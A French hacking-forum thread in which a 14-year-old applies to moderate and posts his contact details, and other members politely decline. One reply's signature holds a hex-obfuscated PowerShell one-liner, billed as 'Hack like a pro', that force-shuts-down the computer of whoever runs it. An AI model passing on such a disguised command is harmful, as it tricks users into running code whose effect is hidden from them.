Annonce

Réduire
Aucune annonce.

Je me présente pour devenir Staff de Hackademics.

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Je me présente pour devenir Staff de Hackademics.

    Bonjour/Bonsoir

    Pseudo (+autres si plusieurs) :Pagueis

    Connaissances informatiques générales :VB.NET / HTML / CSS

    Connaissances en hacking :Cracking en masse (BruteForce)

    Système d'exploitation principal :Windows Seven (Intégrale)

    Je viens sur ce forum pour :Apprendre et aider mes prochains.

    J'ai connu ce forum via : Un moteur de recherche.

    Informations supplémentaires (job, intérêts, autres...) :

    Qui suis-je?

    Je m'appelle Sébastien, j'ai actuellement 14 ans, et je suis étudiant au collège.
    Actuellement je suis dans le Modding et la vente, je possède une PS3 CEX qui me permet de pratiquer cette activité.
    Je suis passionné de tout ce qui touche la programmation. Je ne me débrouille pas trop mal avec le VB.net et un vrai débutant avec le html. Évidemment ce sont des choses que j'apprendrai plus tard, ça peut toujours servir. En dehors de ça j'aime beaucoup sortir et faire du BMX.
    Assez parlé de moi, passons à l'autre partie, à savoir pourquoi j'aimerai être modérateur.

    Pourquoi devenir modérateur ?

    Et bien je suis à l'écoute et au service de la communauté quand celle-ci a besoin d'aide. Toujours présent je garantis un temps de réponse bref sur le forum.
    J'aiderai bien sûr les personnes qui en auront besoin, et aiderai aussi les autres modérateurs si besoin.
    Je m'engage à sortir régulièrement des tutoriels. J'en ai actuellement plusieurs en tête dont "Comment installer un ModMenu pour sa PS3 CFW avec un PKG ?" (Et oui on ne sait pas tous le faire ).
    J'aimerai aider mon prochain sur ce serveur et contribuer au serveur en aidant le staff déjà présent ou même en faisant respecter le règlement.
    J'apporterai du sérieux et de l'aide, et de la bonne volonté, j'essayerai d'apporter régulièrement des tutoriels.

    Me contacter:

    Facebook : https://www.facebook.com/profile.php?id=100011083332967
    Mon PSN : Pagueis
    Mon Skype : hpx.hat

  • #2
    Bienvenue.

    Commentaire


    • #3
      Sérieusement ?

      Bienvenue, mais pour ta demande ça sera gentiment décliné...
      Mon blog : http://rootsheep.info

      Commentaire


      • #4
        Envoyé par Sadik Voir le message
        Sérieusement ?

        Bienvenue, mais pour ta demande ça sera gentiment décliné...
        Bonjour, c'est vrai, je me suis présenter, il faut d'abord que je poste quelques topics avant...
        Merci a vous.

        Cordialement
        Pagueis

        Commentaire


        • #5
          Ben c'est super tout ça Par contre, pas de Gaming c'est pas trop le genre et les sections ne s'y prêtent pas

          En tous cas c'est cool, au vu du nombre de personnes qui ont promis des tutoriels, on devrait passer notre temps depuis à tout lire ^^

          Hâte de voir ce que tu a à nous apprendre.
          Dernière modification par DreAmuS, 05 février 2016, 19h22.

          Commentaire


          • #6
            Bonjour. Vouloir s'investir dans un rôle de modérateur à 14 ans, c'est très bien. J'espère que hackandmodz saura répondre positivement à ta requête.
            sigpic

            Cyprium Download Link

            Plus j'étudie plus j'me rends compte que je n'sais rien.

            †|

            Commentaire


            • #7
              Envoyé par SAKAROV Voir le message
              Vouloir s'investir dans un rôle de modérateur à 14 ans, c'est très bien.
              Effectivement ! c'est prometteur... et courageux !

              Commentaire


              • #8
                Pagueis

                Bonjour et merci de ta proposition,

                On ne s'est pas penché sur ton cas, mais il est évident, à moins de connaître personnellement un des administrateurs du forum, que ta requête ne pourra être retenue pour la seule et bonne raison que le nombre de topics est très nettement insuffisant pour annoncer un investissement.

                Je t'invite à participer aux discussions de manière sérieuse, ainsi tu pourras évoluer tant techniquement qu'humainement. À l'heure actuelle, si je devais faire une proposition concernant un modérateur, beaucoup passerait devant lié à leur investissement sur le forum.

                Encore merci pour la proposition et d'avance merci pour ta compréhension...

                À bientôt sur le forum,

                Commentaire


                • #9
                  080513-indian-hlrg-8a.grid-6x2.jpg
                  Hack like a pro :
                  PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

                  Commentaire

                  Chargement...
                  X